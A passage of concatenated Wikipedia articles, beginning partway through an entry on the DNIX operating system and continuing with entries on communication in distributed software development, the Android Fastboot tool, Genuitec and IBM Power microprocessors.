Of note is that the asynchronous events were gathered via normal file descriptor read operations, and that such reading was itself capable of being made asynchronous. This had implications for semi-autonomous asynchronous event handling packages that could exist within a single process. (DNIX 5.2 did not have lightweight processes or threads.) Also of note is that any potentially blocking operation was capable of being issued asynchronously, so DNIX was well equipped to handle many clients with a single server process. A process was not restricted to having only one trap queue, so I/O requests could be grossly prioritized in this way.
Compatibility
In addition to the native dnix(2) call, a complete set of 'standard' libc interface calls was available.
open(2), close(2), read(2), write(2), etc. Besides being useful for backwards compatibility, these were implemented in a binary-compatible manner with the NCR Tower computer, so that binaries compiled for it would run unchanged under DNIX. The DNIX kernel had two trap dispatchers internally, one for the DNIX method and one for the Unix method. Choice of dispatcher was up to the programmer, and using both interchangeably was acceptable. Semantically they were identical wherever functionality overlapped. (In these machines the 68000 trap #0 instruction was used for the unix(2) calls, and the trap #4 instruction for dnix(2). The two trap handlers were really quite similar, though the [usually hidden] unix(2) call held the function code in the processor's D0 register, whereas dnix(2) held it on the stack with the rest of the parameters.)
DNIX 5.2 had no networking protocol stacks internally (except for the thin X.25-based Ethernet protocol stack added by ISC for use by its diskless workstation support package), all networking was conducted by reading and writing to Handlers. Thus, there was no socket mechanism, but a libsocket(3) existed that used asynchronous I/O to talk to the TCP/IP handler. The typical Berkeley-derived networking program could be compiled and run unchanged (modulo the usual Unix porting problems), though it might not be as efficient as an equivalent program that used native asynchronous I/O.
Handlers
Under DNIX, a process could be used to handle I/O requests and to extend the filesystem. Such a process was called a Handler, and was a major feature of the operating system. A handler was defined as a process that owned at least one request queue, a special file descriptor that was procured in one of two ways: with a F_ORQ or a F_MOUNT call. The former invented an isolated request queue, one end of which was then typically handed down to a child process. (The network remote execution programs, of which there were many, used this method to provide standard I/O paths to their children.) The latter hooked into the filesystem so that file I/O requests could be adopted by handlers. (The network login programs, of which there were even more, used this method to provide standard I/O paths to their children, as the semantics of logging in under Unix requires a way for multiple perhaps-unrelated processes to horn in on the standard I/O path to the operator.) Once mounted on a directory in the filesystem, the handler then received all I/O calls to that point.
A handler would then read small kernel-assigned request data structures from the request queue. (Such reading could be done synchronously or asynchronously as the handler's author desired.) The handler would then do whatever each request required to be satisfied, often using the DNIX F_UREAD and F_UWRITE calls to read and write into the request's data space, and then would terminate the request appropriately using F_TERMIN. A privileged handler could adopt the permissions of its client for individual requests to subordinate handlers (such as the filesystem) via the F_T1REQ call, so it didn't need to reproduce the subordinate's permission scheme. If a handler was unable to complete a request itself, the F_PASSRQ function could be used to pass I/O requests from one handler to another. A handler could perform part of the work requested before passing the rest on to another handler. It was very common for a handler to be state-machine oriented so that requests it was fielding from a client were all done asynchronously. This allowed for a single handler to field requests from multiple clients simultaneously without them blocking each other unnecessarily. Part of the request structure was the process ID and its priority so that a handler could choose what to work on first based upon this information, there was no requirement that work be performed in the order it was requested. To aid in this, it was possible to poll both request and trap queues to see if there was more work to be considered before buckling down to actually do it.
struct ireq { /* Structure of incoming request */
short ir_fc; /* Function code */
short ir_rn; /* Request number */
long ir_opid; /* Owner ID that you gave on open or mount */
long ir_bc; /* Byte count */
long ir_upar; /* User parameter */
long ir_rad; /* Random address */
ushort ir_uid; /* User ID */
ushort ir_gid; /* User group */
time_t ir_time; /* Request time */
ulong ir_nph;
ulong ir_npl; /* Node and process ID */
};
There was no particular restriction on the number of request queues a process could have. This was used to provide networking facilities to chroot jails, for example.
Examples
To give some appreciation of the utility of handlers, at ISC handlers existed for:
foreign filesystems
FAT
CD-ROM/ISO9660
disk image files
RAM disk (for use with write-protected boot disks)
networking protocols
DNET (essentially X.25 over Ethernet, with multicast capability)
X.25
TCP/IP
DEC LAT
AppleTalk
remote filesystems
DNET's /net/machine/path/from/its/root...
NFS
remote login
ncu (DNET)
telnet
rlogin
wcu (DNET GUI)
X.25 PAD
DEC LAT
remote execution
rx (DNET)
remsh
rexec
system extension
windowman (GUI)
vterm (xterm-like)
document (passbook) printer
dmap (ruptime analog)
windowmac (GUI gateway to Macintosh)
system patches
named pipe handler
ISC's extensions
ISC purchased both 5.2 (SVR2 compatible) and 5.3 (SVR3 compatible) versions of DNIX. At the time of purchase, DNIX 5.3 was still undergoing development at DIAB so DNIX 5.2 was what was deployed. Over time, ISC's engineers incorporated most of their 5.3 kernel's features into 5.2, primarily shared memory and IPC, so there was some divergence of features between DIAB and ISC's versions of DNIX. DIAB's 5.3 likely went on to contain more SVR3 features than ISC's 5.2 ended up with. Also, DIAB went on to DNIX 5.4, a SVR4 compatible OS.
At ISC, developers considerably extended their version of DNIX 5.2 (only listed are features involving the kernel itself) based upon both their needs and the general trends of the Unix industry:
Diskless workstation support. The workstation's kernel filesystem was removed, and replaced with an X.25-based Ethernet communications stub. The file server's kernel was also extended with a mating component that received the remote requests and handed them to a pool of kernel processes for service, though a standard handler could have been written to do this. (Later in its product lifecycle, ISC deployed standard SVR4-based Unix servers in place of the DNIX servers. These used X.25 STREAMS and a custom-written file server program. In spite of the less efficient structuring, the raw horsepower of the platforms used made for a much faster server. It is unfortunate that this file server program did not support all of the functionality of the native DNIX server. Tricky things, like named pipes, never worked at all. This was another justification for the named pipe handler process.)
gdb watchpoint support using the features of ISC's MMU.
Asynchronous I/O to the filesystem was made real. (Originally it blocked anyway.) Kernel processes (kprocs, or threads) were used to do this.
Support for a truss- or strace-like program. In addition to some repairs to bugs in the standard Unix ptrace single-stepping mechanism, this required adding a temporary process adoption facility so that the tracer could use the standard single-stepping mechanism on existing processes.
SVR4 signal mechanism extensions. Primarily for the new STOP and CONT signals, but encompassing the new signal control calls as well. Due to ISC's lack of source code for the adb and sdb debuggers the u-page could not be modified, so the new signals could only be blocked or receive default handling, they could not be caught.
Support for network sniffing. This required extending the Ethernet driver so that a single event could satisfy more than one I/O request, and conditionally implementing the hardware filtering in software to support promiscuous mode.
Disk mirroring. This was done in the filesystem and not the device driver, so that slightly (or even completely) different devices could still be mirrored together. Mirroring a small hard disk to the floppy was a popular way to test mirroring as ejecting the floppy was an easy way to induce disk errors.
32-bit inode, 30-character filename, symbolic link, and sticky directory extensions to the filesystem. Added /dev/zero, /dev/noise, /dev/stdXXX, and /dev/fd/X devices.
Process group id lists (from SVR4).
#! direct script execution.
Serial port multiplication using ISC's Z-80 based VMEbus communications boards.
Movable swap partition.
Core 'dump' snapshots of running processes. Support for fuser command.
Process renice function. Associated timesharing reprioritizer program to implement floating priorities.
A way to 'mug' a process, instantly depriving it of all memory resources. Very useful for determining what the current working set is, as opposed to what is still available to it but not necessarily being used. This was associated with a GUI utility showing the status of all 1024 pages of a process's memory map. (This being the number of memory pages supported by ISC's MMU.) In use you would 'mug' the target process periodically through its life and then watch to see how much memory was swapped back in. This was useful as ISC's production environment used only a few long-lived processes, controlling their memory utilization and growth was key to maintaining performance.
Features that were never added
When DNIX development at ISC effectively ceased in 1997, a number of planned OS features were left on the table:
Shared objects - There were two dynamically loaded libraries in existence, an encryptor for DNET and the GUI's imaging library, but the facility was never generalized. ISC's machines were characterized by a general lack of virtual address space, so extensive use of memory-mapped entities would not have been possible.
Lightweight processes - The kernel itself already had multiple threads that shared a single MMU context, extending this to user processes should have been straightforward. The API implications would have been the most difficult part of this.
Access Control Lists - Trivial to implement using an ACL handler mounted over the stock filesystem.
Multiple swap partitions - DNIX already used free space on the selected volume for swapping, it would have been easy to give it a list of volumes to try in turn, potentially with associated space limits to keep it from consuming all free space on a volume before moving on to the next one.
Remote kernel debugging via gdb - All the pieces were there to do it either through the customary serial port or over Ethernet using the kernel's embedded X.25 link software, but they were never assembled.
68030 support - ISC's prototypes were never completed. Two processor piggyback plug-in cards were built, but were never used as more than faster 68020's. They were not reliable, nor were they as fast as they could have been due to having to fit into a 68020 socket. The fast context switching ISC MMU would be left disabled (and left out altogether in proposed production units), and the embedded one of the 68030 was to have been used instead, using a derivative of the DS90-20's MMU code. While the ISC MMU was very efficient and supported instant switching among 32 resident processes, it was very limited in addressability. The 68030 MMU would have allowed for much more than 8 MB of virtual space in a process, which was the limit of the ISC MMU. Though this MMU would be slower, the overall faster speed of the 68030 should have more than made up for it, so that a 68030 machine was expected to be in all ways faster, and support much larger processes.
See also
Timeline of operating systems
Cromemco Cromix
References
UNIX System V
Real-time operating systems
|
54305815
|
https://en.wikipedia.org/wiki/Communication%20in%20distributed%20software%20development
|
Communication in distributed software development
|
Communication in Distributed Software Development is an area of study that considers communication processes and their effects when applied to software development in a globally distributed development process. The importance of communication and coordination in software development is widely studied and organizational communication studies these implications at an organizational level. This also applies to a setting where teams and team members work in separate physical locations. The imposed distance introduces new challenges in communication, which is no longer a face to face process, and may also be subjected to other constraints such as teams in opposing time zones with a small overlap in working hours.
There are several reasons that force elements from the same project to work in geographically separated areas, ranging from different teams in the same company to outsourcing and offshoring, to which different constraints and necessities in communication apply. The added communication challenges result in the adoption of a wide range of different communication methods usually used in combination. They can either be in real time as in the case of a video conference, or in an asynchronous way such as email. While a video conference might allow the developers to be more efficient with regards to their time spent communicating, it is more difficult to accomplish when teams work in different time zones, in which case using an email or a messaging service might be more useful.
History
The history of communication in distributed software development is tied to the historical setting of distributed development itself. Communication tools helped in advancing the distributed development process, since communication was the principal missing component in early attempts for distributed software development . One of the main factors in the creation of new tools and making distributed development a viable methodology is the introduction of the Internet as an accessible platform for developers and researchers, facilitating the exchange of both code and information in a team.
One of the first manifestations of distributed development is the open-source community, where developers are joined together not by an enterprise and its resources but by voluntarily participating in the same project, resulting in diverse teams from different geographical locations. In these projects there is a surging need for communication and collaboration tools. The history of free and open-source software shows that as time progressed, the complexity of the projects and the number of involved people increased. Better communication and collaboration tools had an important role on this increase. Initially the available methods were mostly asynchronous forms of communication such as the email and mailing lists or even relying on periodical written publications to spread information. Synchronous communication would be mostly limited to telephone calls .
In this early stage there aren't many accounts of this kind of distributed development on an enterprise setting . However, the developments and tools of previous years pioneered the necessary means for companies to start investigating and adopting these practices when advantages could be obtained. More tools such as Audio conferencing and Instant messaging appeared mostly for other purposes but were quickly adopted, and continued to push forward the idea of distributed development. This new movement created an interest in the area of study that is Communication in Distributed Software Development to further improve the effectiveness and quality of the development process.
Importance
Software development, in general, requires a great deal of information exchange and studies show that a great percentage of a developer's time is spent on collaborative/communication activities. While formal communication is used for essential tasks such as updating a project status or determining who has responsibility for any particular work, informal communication is also crucial for the development process. Informal communication, or "corridor talk", helps developers stay aware of what is going on around them, what other employees are working on, who has expertise in what area, and many other essential pieces of background information that enables them to work together efficiently and create the "spirit of a team". Studies also show that the more uncertain a project is, the more important is this kind of communication.
In a Global Software engineering (GSE) environment, informal communication is hard to recreate. The lack of this type of communication can lead to surprises, resulting in misalignment and rework. For this reason, Communication in Distributed Software Development is important for any company that is applying GSE. This area of study, among other things, tries to recreate informal communication in a GSE environment, in order to develop software without the loss of development speed that is characteristic to this environment.
Challenges
Communication can be hindered by several barriers, such as socio-cultural, linguistic, knowledge, geographical and temporal barriers.
Socio-cultural barriers can manifest themselves as the means of communication. In fact, a study shows that U.S. and Japanese clients have distinct preferences with regards to them. U.S. clients prefer to communicate frequently via informal telephone and email contacts, while Japanese clients prefer verbal communication and less frequent but formal use of electronic media.
Linguistic barriers typically manifest themselves when at least one of the actors in a conversation is not speaking its native language. Aside from the fact that one should be able to express himself better in his native language, there are other obstacles. Idiomatic expressions and slang are an examples of such obstacles that difficult informal communication.
According to Allen's Curve, the frequency of communication between engineers drops at an exponential rate as the distance between them increases. In case of coworkers in a company, communication is often triggered by random encounters between coworkers. When there is a significant distance between the latter, their communication decreases. In fact, an empirical study was conducted that compared the frequency of communication between coworkers from local and remote sites. Most of the inquired answered that they speak to the majority of their local colleagues at least once a day, while speaking less than once a week with their remote ones.
Temporal barriers are closely related to geographical barriers. Temporal barriers are typically present on a scenario where two or more coworkers are in different time zones and oftentimes in different geographic locations. Developers mostly communicate during work hours, and while they can use asynchronous communication which doesn't require overlapping work hours, it inherently delays the communication process. As an alternative they can use synchronous communication if they need to communicate in real time, however it introduces the complication of finding overlapping work hours. Follow-the-sun is a common approach taken by software companies to mitigate the latter issue.
Research
Research on Communication in Distributed Software Development is conducted in order to improve the understanding of the implications of different communication methods on the success of the development process and the final product.
Communication is an essential process in coordinating a software development project and sharing knowledge between the team members. Previous studies claim that sharing knowledge is important to building trust and even improving the performance of the whole team, which also applies in a distributed software development process.
It can also bring challenges, as referred in the section above, that when improperly dealt with can delay a team project or even cost money to the company. A great deal of studies tries to find ways to mitigate these problems and avoid miscommunication.
The tools used for communication are within the scope of some studies. They show the advantages and disadvantages of some different types of tools, and also which kind of tools the developers like to use for certain situations.
The interest of researchers in how a globally distributed development influences the success of the project is noted in publications such as where the author mentions the need for more empirical studies on the subject. Another study tried to find more direct relations between time zones and language barriers without significant results, which as suggested by the author, might be due to low sample size. However it was shown that there is indeed a relationship between distributed development and longer response times between collaborators. There are also studies that correlate the frequency of communication and the geographical distance, such as Allen curve.
The research done so far points to the need of improving the methodologies and tools used by companies and that communication is a big factor in the success of a company.
Forms of communication
Communication in a collaboration setting can be achieved either synchronously or asynchronously, differing in how agents interact with each other. The different communication forms create analogous communication systems and tools depending on the type of communication supported, which serve different purposes in a distributed development setting. Even inside a company, the tasks and responsibilities of different members reflect in their usage in the tools used in the work environment.
Synchronous systems
In synchronous systems, the participants simultaneously receive and send information in "real time", and a message is usually followed by a response in a short time span. This type of communication is used for communication that requires an immediate response when the other participant is promptly available or for more informal communication in a direct setting. It can be used in an enterprise to answer questions quickly, discuss ideas, convey important developments that need attention or any other important message.
Asynchronous systems
Asynchronous systems provide a mechanism for submission and retrieval of messages, where the sender can send information whenever he likes and the recipient will only retrieve it and reply when he is available. This form of communication can be used to have a discussion or convey information about less urgent matters since no answer is guaranteed promptly. It is useful in a distributed development process especially because most of the time the different teams working on a project don't do so simultaneously, and matters that are not urgent can be discussed asynchronously.
Hybrid systems
There is also another possible approach in which a system provides both forms of communication in the same environment to allow more flexibility in communication. These systems can be referred to as Hybrid systems where messages exchanged usually have the characteristics of asynchronous messages, but the systems are also conceived in order to use these messages as a form of synchronous communication. They present a middle ground between asynchronous and synchronous communication.
Tools
Communication tools for Globally Distributed Software Engineering can be of various types that vary with the communication form used, the interface provided to the user, among others. Also, different categories can use different sensory information to improve the communication. The tools available include instant messaging, email, audio and video conference, virtual office and virtual reality. This section provides an overview of different types of tools and some popular examples that are in use currently, however it is not a thorough collection and listing of available tools. More complete listings can be found in other resources.
Asynchronous tools
Email
Email is a method of exchanging digital messages between people using digital devices such as computers, mobile phones and other electronics. Unlike the most instant messaging tools, on email neither the users nor their computers are required to be online simultaneously. The cost of using email in company varies, since, for example, the company might have its own email server.
Empirical studies demonstrated that all team members on a software development team used this tool effectively. Unlike instant messaging, email messages are intended to be more stand-alone and less sensitive to the context of communication, and thus producing email messages requires more time than traditional IM messages.
Some email providers are Gmail, Outlook.com and ProtonMail.
Synchronous tools
Audio and video conference
Audio and video conference are the technologies for the reception and transmission of audio-video signals by users at different locations, for communication between people in real-time. These type of tools attempts to replicate the rich interaction present in face-to-face meetings. Rich synchronous communication technology such as video-conferencing is appropriate for highly interactive discussions where body language and intonation can convey the degree of understanding or agreement among participants.
Video conference is also a good way to develop trust among global software developers, since it allows team members to form personal relationships.
Investigators found out that team members who are not confident with their English language skills prefer to use email or instant messaging over audio and video conferencing, as text-based media provide more time to comprehend and compose a response. This becomes a problem, since text-based media doesn't use neither auditory nor visual features, which can hinder the process of understanding important information and lead to misunderstandings.
Zoom, GoToMeeting and Highfive are examples of these type of tools.
Virtual Offices
Virtual Offices recreate the personal proximity and functionality of a physical office needed by teams in a global distributed software engineering environment. Instead of having "channels" or "messages threads", virtual offices have rooms on a virtual office space.
Professor Thomas J. Allen in the late 1970s discovered that the increase of distance between engineers reduces exponentially the frequency of communication between them. Virtual offices are a way to virtually reduce that distance, in order to increase the communication among them.
Furthermore, other studies show that virtual offices make work coordination easier and improve the performance in a team.
Some tools that belong to this subset are Sococo, 8x8 and Skype for Business.
Virtual Reality
Virtual Reality has gained increased interest over the years. It has grew from an industry of 129 million USD in 2015 to over 1 billion USD by the end of 2016. It is estimated that the industry will reach 4.6 billion USD by the end of 2018.
The content exchanged during the act of communication is merely the interpretations of the situations in which the actors are involved. The latter, in turn, depend on the context. The motivation for using virtual reality as a communication tool is based on the premise that one's perception of context is proportional to the sensorial information available.
In a virtual reality communication setup, each of its participants is under sensorial immersion. This improves the perception of the context in which the actor is in, which in turn improves the communication experience itself.
Even though the concept is not recent, the technology only started to be significantly developed as of 2010.
AltspaceVR is an example of a virtual reality platform which was recently used as a communication tool.
Hybrid tools
Instant Messaging
Instant messaging (IM) allows the transmission of messages between two parties or more in case of a "chat room". It can be synchronous or asynchronous and it's considered to be the less intrusive communication type. Researches show that developers like to use this type of tools to ask quick questions to their peers or superiors.
WhatsApp, Facebook Messenger and HipChat are examples for this type of tool.
Applications in software processes
Agile
Mixing Agile software development and Distributed Software Development brings a lot of challenges to the team communication. On one hand, Agile software development demands an increase for informal communication and lacks formal communication, like documentation. On the other hand, Distributed Software Development makes it difficult to initiate communication, can lead to misunderstandings and increases the communication cost (time, money, etc.) as explained previously #Challenges, which can lead to a decrease on the frequency of communication. This makes the area of study presented of utter importance in Distributed Agile Software Development. One of its core principles emphasizes the relationships between individuals and their interactions, entailing constant communication.
Extreme Programming
Extreme programming (XP) was designed for an environment where all developers were co-located, which is not the case for Distributed Software Development. Furthermore, XP is heavily reliant on continuous communication between stakeholders and developers, which makes communication one of the five core values of XP. Consequently, communication on distributed environment is of utter importance for a XP development environment and should be taken into account when applying this methodology on a distributed environment.
References
External links
Mind the Gap, list of tools for Global Software Engineering
Software development
|
28210693
|
https://en.wikipedia.org/wiki/Fastboot
|
Fastboot
|
Fastboot is a protocol and a tool of the same name. It is included with the Android SDK package used primarily to modify the flash filesystem via a USB connection from a host computer. It requires that the device be started in Fastboot mode. If the mode is enabled, it will accept a specific set of commands sent to it via USB using a command line. Fastboot allows to boot from a custom recovery image. Fastboot does not require USB debugging to be enabled on the device. Not all Android devices have fastboot enabled. To use fastboot, a specific combination of keys must be held during boot.
Android device manufacturers are allowed to choose if they want to implement fastboot or some other protocol.
Keys pressed
The keys that have to be pressed for fastboot differ for various vendors.
HTC, Xiaomi, and Google Pixel: Power and volume down
Sony: Power and volume up
Google Nexus: Power, volume up and volume down
On Samsung devices, (excluding the Nexus S and Galaxy Nexus devices), power, volume down and home has to be pressed for entering ODIN mode. This is a proprietary protocol and tool as an alternative to fastboot.
Commands
Some of the most commonly used fastboot commands include:
flash rewrites a partition with a binary image stored on the host computer.
flashing unlock/oem unlock *** unlocks an OEM locked bootloader for flashing custom/unsigned ROMs. The *** is a device specific unlock key.
erase erases a specific partition.
reboot reboots the device into either the main operating system, the system recovery partition or back into its boot loader.
devices displays a list of all devices (with the serial number) connected to the host computer.
format formats a specific partition; the file system of the partition must be recognized by the device.
Implementations
The fastboot protocol has been implemented in the Little Kernel fork of Qualcomm and in TianoCore EDK II.
Fastboot is a mode of the Android bootloader called ABOOT.
See also
Bootloader unlocking
Android recovery mode
References
External links
Flashing Devices - Android.com
Fastboot protocol specification
Reverse Engineering Android's Aboot
Android (operating system)
Communications protocols
Android (operating system) development software
|
7097316
|
https://en.wikipedia.org/wiki/Genuitec
|
Genuitec
|
Genuitec, LLC is a software development company that operates as an entirely virtual organization.
History
Genuitec’s roots go back to 1997 when Maher Masri, Todd Williams and Wayne Parrot started an enterprise-consulting company. After seeing a real need for better software development tools, they built them and used them extensively. Genuitec was established in 2001 as a small independent software company. As a founding member of the Eclipse Foundation, it actively participates in strategy, development, and direction for the organization.
References
Software companies based in Texas
Companies based in Dallas
Software companies of the United States
1997 establishments in the United States
1997 establishments in Texas
Software companies established in 1997
Companies established in 1997
|
38905656
|
https://en.wikipedia.org/wiki/IBM%20Power%20microprocessors
|
IBM Power microprocessors
|
IBM Power (originally POWER prior to Power10) is a line of microprocessors designed and sold by IBM for servers and supercomputers. The name "POWER" was originally presented as an acronym for "Performance Optimization With Enhanced RISC". These processors have been used by IBM in their RS/6000, AS/400, pSeries, iSeries, System p, System i and Power Systems line of servers and supercomputers. They have also been used in data storage devices and workstations by IBM and by other server manufacturers like Bull and Hitachi.
The Power family of processors were originally developed in the late 1980s and still remain under active development. In the beginning, they implemented the POWER instruction set architecture (ISA), which evolved into PowerPC and later into Power ISA. In August 2019, IBM announced it would be open-sourcing the Power ISA. As part of the move, it was also announced that administration of the OpenPOWER Foundation will now be handled by the Linux Foundation.
History
Early developments
The 801 research project
In 1974 IBM started a project to build a telephone switching computer that required, for the time, immense computational power. Since the application was comparably simple, this machine would need only to perform I/O, branches, add register-register, move data between registers and memory, and would have no need for special instructions to perform heavy arithmetic. This simple design philosophy, whereby each step of a complex operation is specified explicitly by one machine instruction, and all instructions are required to complete in the same constant time, would later come to be known as RISC. When the telephone switch project was cancelled IBM kept the design for the general purpose processor and named it 801 after building #801 at Thomas J. Watson Research Center.
The Cheetah project
By 1982 IBM continued to explore the superscalar limits of the 801 design by using multiple execution units to improve performance to determine if a RISC machine could maintain multiple instructions per cycle. Many changes were made to the 801 design to allow for multiple execution units and the Cheetah processor had separate branch prediction, fixed-point, and floating-point execution units. By 1984 CMOS was chosen since it allowed an increase in the level of circuit integration while improving transistor-logic performance.
The America project
In 1985, research on a second-generation RISC architecture started at the IBM Thomas J. Watson Research Center, producing the "AMERICA architecture"; in 1986, IBM Austin started developing the RS/6000 series computers based on that architecture. This was to become the first POWER processors using the first POWER ISA.
POWER
In February 1990, the first computers from IBM to incorporate the POWER ISA were called the "RISC System/6000" or RS/6000. These RS/6000 computers were divided into two classes, workstations and servers, and hence introduced as the POWERstation and POWERserver. The RS/6000 CPU had 2 configurations, called the "RIOS-1" and "RIOS.9" (or more commonly the POWER1 CPU). A RIOS-1 configuration had a total of 10 discrete chips — an instruction cache chip, fixed-point chip, floating-point chip, 4 data L1 cache chips, storage control chip, input/output chips, and a clock chip. The lower cost RIOS.9 configuration had 8 discrete chips—an instruction cache chip, fixed-point chip, floating-point chip, 2 data cache chips, storage control chip, input/output chip, and a clock chip.
The POWER1 is the first microprocessor that used register renaming and out-of-order execution. A simplified and less powerful version of the 10 chip RIOS-1 was made in 1992 was developed for lower-end RS/6000s. It used only one chip and was called "RISC Single Chip" or RSC.
POWER1 processors
RIOS-1 the original 10-chip version
RIOS.9 a less powerful version of RIOS-1
POWER1+ a faster version of RIOS-1 made on a reduced fabrication process
POWER1++ an even faster version of RIOS-1
RSC a single-chip implementation of RIOS-1
RAD6000 a radiation-hardened version of the RSC was made available for primarily use in space; it was a very popular design and was used extensively on many high-profile missions
POWER2
IBM started the POWER2 processor effort as a successor to the POWER1. By adding a second fixed-point unit, a second powerful floating point unit, and other performance enhancements and new instructions to the design, the POWER2 ISA had leadership performance when it was announced in November 1993. The POWER2 was a multi-chip design, but IBM also made a single chip design of it, called the POWER2 Super Chip or P2SC that went into high performance servers and supercomputers. At the time of its introduction in 1996, the P2SC was the largest processor with the highest transistor count in the industry and was a leader in floating point operations.
POWER2 processors
POWER2 6 to 8 chips were mounted on a ceramic multi chip module
POWER2+ a cheaper 6-chip version of POWER2 with support for external L2 caches
P2SC a faster and single chip version of POWER2
P2SC+ an even faster version or P2SC due to reduced fabrication process
PowerPC
In 1991, Apple looked for a future alternative to Motorola's 68000-based CISC platform, and Motorola experimented with a RISC platform of its own, the 88000. IBM joined the discussion and the three founded the AIM alliance to build the PowerPC ISA, heavily based on the POWER ISA, but with additions from both Apple and Motorola. It was to be a complete 32/64 bit RISC architecture, with a promise to range from very low end embedded microcontrollers to the very high end supercomputer and server applications.
After two years of development, the resulting PowerPC ISA was introduced in 1993. A modified version of the RSC architecture, PowerPC added single-precision floating point instructions and general register-to-register multiply and divide instructions, and removed some POWER features. It also added a 64-bit version of the ISA and support for SMP.
The Amazon project
In 1990, IBM wanted to merge the low end server and mid range server architectures, the RS/6000 RISC ISA and AS/400 CISC ISA into one common RISC ISA that could host both IBM's AIX and OS/400 operating systems. The existing POWER and the upcoming PowerPC ISAs were deemed unsuitable by the AS/400 team so an extension to the 64-bit PowerPC instruction set was developed called PowerPC AS for Advances Series or Amazon Series. Later, additions from the RS/6000 team and AIM Alliance PowerPC were included, and by 2001, with the introduction of POWER4, they were all joined into one instruction set architecture: the PowerPC v.2.0.
POWER3
The POWER3 began its life as "PowerPC 630", a successor of the commercially unsuccessful PowerPC 620. It used a combination of the POWER2 ISA and the 32/64-bit PowerPC ISA set with support for SMP and single-chip implementation. It was used to great extent in IBM's RS/6000 computers, while the second generation version, the POWER3-II, was the first commercially available processor from IBM using copper interconnects. The POWER3 was the last processor to use a POWER instruction set; all subsequent models used some version of the PowerPC instruction set.
POWER3 processors
POWER3 – Introduced in 1998, it combined the POWER and PowerPC instruction sets.
POWER3-II – A faster POWER3 fabricated on a reduced size, copper based process.
POWER4
The POWER4 merged the 32/64 bit PowerPC instruction set and the 64-bit PowerPC AS instruction set from the Amazon project to the new PowerPC v.2.0 specification, unifying IBM's RS/6000 and AS/400 families of computers. Besides the unification of the different platforms, POWER4 was also designed to reach very high frequencies and have large on-die L2 caches. It was the first commercially available multi-core processor and came in single-die versions as well as in four-chip multi-chip modules. In 2002, IBM also made a cost- and feature-reduced version of the POWER4 called PowerPC 970 by Apple's request.
POWER4 processors
POWER4 – The first dual core microprocessor and the first PowerPC processor to reach beyond 1 GHz.
POWER4+ – A faster POWER4 fabricated on a reduced process.
POWER5
The POWER5 processors built on the popular POWER4 and incorporated simultaneous multithreading into the design, a technology pioneered in the PowerPC AS based RS64-III processor, and on-die memory controllers. It was designed for multiprocessing on a massive scale and came in multi-chip modules with onboard large L3 cache chips.
POWER5 processors
POWER5 – The iconic setup with four POWER5 chips and four L3 cache chips on a large multi-chip module.
POWER5+ – A faster POWER5 fabricated on a reduced process mainly to reduce power consumption.
Power ISA
A joint organization was founded in 2004 called Power.org with the mission to unify and coordinate future development of the PowerPC specifications. By then, the PowerPC specification was fragmented since Freescale (née Motorola) and IBM had taken different paths in their respective development of it. Freescale had prioritized 32-bit embedded applications and IBM high-end servers and supercomputers. There was also a collection of licensees of the specification like AMCC, Synopsys, Sony, Microsoft, P.A. Semi, CRAY and Xilinx that needed coordination. The joint effort was not only to streamline development of the technology but also to streamline marketing.
The new instruction set architecture was called Power ISA and merged the PowerPC v.2.02 from the POWER5 with the PowerPC Book E specification from Freescale as well as some related technologies like the Vector-Media Extensions known under the brand name AltiVec (also called VMX by IBM) and hardware virtualization. This new ISA was called Power ISA v.2.03 and POWER6 was the first high end processor from IBM to use it. Older POWER and PowerPC specifications did not make the cut and those instruction sets were henceforth deprecated for good. There is no active development on any processor type today that uses these older instruction sets.
POWER6
POWER6 was the fruit of the ambitions eCLipz Project, joining the I (AS/400), P (RS/6000) and Z (Mainframe) instruction sets under one common platform. I and P was already joined with the POWER4, but the eCLipz effort failed to include the CISC based z/Architecture and where the z10 processor became POWER6's eCLipz sibling. z/Architecture remains a separate design track to this day not related to Power ISA instruction set in any way.
Because of eCLipz, the POWER6 is an unusual design as it aimed for very high frequencies and sacrificed out-of-order execution, something that has been a feature for POWER and PowerPC processors since their inception. POWER6 also introduced the decimal floating point unit to the Power ISA, something it shares with z/Architecture.
With the POWER6, in 2008 IBM merged the former System p and System i server and workstation families into one family called Power Systems. Power Systems machines can run different operating systems like AIX, Linux and IBM i.
POWER6 processors
POWER6 – Reached 5 GHz; comes in modules with a single chip on it, and in MCM with two L3 cache chips.
POWER6+ – A minor update, fabricated on the same process as POWER6.
POWER7
The POWER7 symmetric multiprocessor design was a substantial evolution from the POWER6 design, focusing more on power efficiency through multiple cores, simultaneous multithreading (SMT), out-of-order execution and large on-die eDRAM L3 caches. The eight-core chip could execute 32 threads in parallel, and has a mode in which it could disable cores to reach higher frequencies for the ones that are left. It uses a new high-performance floating point unit called VSX that merges the functionality of the traditional FPU with AltiVec. Even while the POWER7 run at lower frequencies than POWER6, each POWER7 core performed faster than its POWER6 counterpart.
POWER7 processors
POWER7 – Comes in single-chip modules or in quad-chip MCM-configurations for supercomputer applications.
POWER7+ – Scaled down fabrication process, and increased L3 cache and frequency.
POWER8
POWER8 is a 4 GHz, 12 core processor with 8 hardware threads per core for a total of 96 threads of parallel execution. It uses 96 MB of eDRAM L3 cache on chip and 128 MB off-chip L4 cache and a new extension bus called CAPI that runs on top of PCIe, replacing the older GX bus. The CAPI bus can be used to attach dedicated off-chip accelerator chips such as GPUs, ASICs and FPGAs. IBM states that it is two to three times as fast as its predecessor, the POWER7.
It was first built on a 22 nanometer process in 2014. In December 2012, IBM began submitting patches to the 3.8 version of the Linux kernel, to support new POWER8 features including the VSX-2 instructions.
POWER9
IBM spent quite a while designing the POWER9 processor according to William Starke, a systems architect for the POWER8 processor. The POWER9 is the first to incorporate elements of the Power ISA version 3.0 that was released in December 2015, including the VSX-3 instructions, and also incorporates support for Nvidia's NVLink bus technology.
The United States Department of Energy together with Oak Ridge National Laboratory and Lawrence Livermore National Laboratory contracted IBM and Nvidia to build two supercomputers, the Sierra and the Summit, that are based on POWER9 processors coupled with Nvidia's Volta GPUs. The Sierra went online in 2017 and the Summit in 2018.
POWER9, which was launched in 2017, is manufactured using a 14 nm FinFET process, and comes in four versions, two 24 core SMT4 versions intended to use PowerNV for scale up and scale out applications, and two 12 core SMT8 versions intended to use PowerVM for scale-up and scale-out applications. Possibly there will be more versions in the future since the POWER9 architecture is open for licensing and modification by the OpenPOWER Foundation members.
Power10
Power10 is a CPU introduced in September 2021. It is built on a 7 nm technology.
Devices
See also
IBM OpenPower
OpenPOWER Foundation
References
External links
IBM Announces $1 Billion Linux Investment for Power Systems (LWN.net)
IBM microprocessors
|
1115509
|
https://en.wikipedia.org/wiki/Rockwell%20Automation
|
Rockwell Automation
|
